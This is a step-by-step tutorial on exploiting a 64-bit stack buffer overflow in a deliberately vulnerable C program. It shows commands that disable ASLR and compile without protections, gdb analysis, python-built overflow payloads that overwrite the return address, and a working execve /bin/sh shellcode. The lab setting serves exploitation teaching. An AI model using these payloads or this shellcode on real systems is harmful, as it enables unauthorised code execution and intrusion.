Stack based Buffer Overflow - 64-bit: A step by step Guide

This step-by-step guide is inspired from the work authored by Mr. Un1k0d3r RingZer0 Team.

* Consider this post as a tutorial with steps, for more details read reference section.

This post uses a shell code as payload to get access to shell using buffer overflow attack.

Vulnerable Code (SH3.c)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) 
{
char buffer[256];
if(argc != 2) 
{
exit(0);
}
printf("%p\n", buffer);
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
return 0;
}        

Note: Buffer pointer address is printed to save time

• Step 1: Ensure ASLR is disabled.

echo "0" > /proc/sys/kernel/randomize_va_space        

• Step 2: Compile the code using gcc.

gcc SH3.c -o SH3 -fno-stack-protector -z execstack        

• Step 3: Trigger the buffer overflow (crash the program with value more than buffer).

• Step 4: Use gdb for analysis.

• Step 5: Trigger the overflow in gdb now.

• Step 6: Disassemble main (disas main).

• Step 7: Create breakpoints for analysis.

• Step 8: Check registers ( look for rbp, rsp and rip).

• Step 9: Trigger the overflow again and stop at breakpoint 2.

run $(python -c 'print "A" *300')        

• Step 10: Check registers (rsp, rbp, rip)

Keep track of Base Pointer (rbp), Stack Pointer (rsp) and Instruction Pointer (rip)

Base pointer points to 0x7fffffffdf10

• ?Step 11: Check rsp status

Current status of rbp (0x7fffffffdf30) , rsp? (0x7fffffffde10)

• Step 12: Check status after breakpoint 2.

Check the updated rbp, rsp (0x7fffffffdf18) and rip (0x555555555228)

Once the program is over (seg fault occurs due to buffer overflow)

Next step is to control the rip register (0x555555555228) with our desired address.

• Step 13: Control rip register.

We calculate the size of the buffer (start address 0x7fffffffde10,?after leave instruction rsp is at 0x7fffffffdf18) as 264 bytes. The size of buffer is 256 bytes in code.

This helps in changing the overflow payload as:

$(python -c ‘print “A”*264 + “B”*6’)??        

Here return address is marked as “BBBBBB” or “\x42\x42\x42\x42\x42\x42” to control the return address.

• Step 14: Use new payload.

We can see our return address 0x0000424242424242

After breakpoint 2 (next instruction)

We have successfully ensured rip has our return address (0x424242424242)

• Step 15: Final attack

Let us reconfirm the base address (0x7fffffffde30)

?Use this address as new return address in the payload.

$(python -c ‘print “A”*264 + “\x30\xde\xff\xff\xff\x7f’)        

Note: Address is confirming little endian format as our machine is based on little endian

Output confirms our address is at rip

Confirming with register information

• Step 16: Time to run shell code.

Working 64-bit Shell Code (30 bytes):

"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"        

Our Initial buffer size was 264 bytes, we need to change the buffer size as 264-30 = 234, these number of A’s will be filler and return address 0x7fffffffde30 will point to the shell code.

The new payload becomes:

run $(python -c 'print"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"+"A" *234+"\x30\xde\xff\xff\xff\x7f" ')        

?If steps are followed properly, we get the access to SHELL.

• Step 17: Attack outside gdb

The real environment is different in terms of variables hence the stack size may vary. Here our printed buffer address will help. Carefully observe it has changed from 0x7fffffffde30 to 0x7fffffffde70

All we have to do is change the return address in the payload to 0x7fffffffde70 and the Buffer overflow attack works.

Reference:

• https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf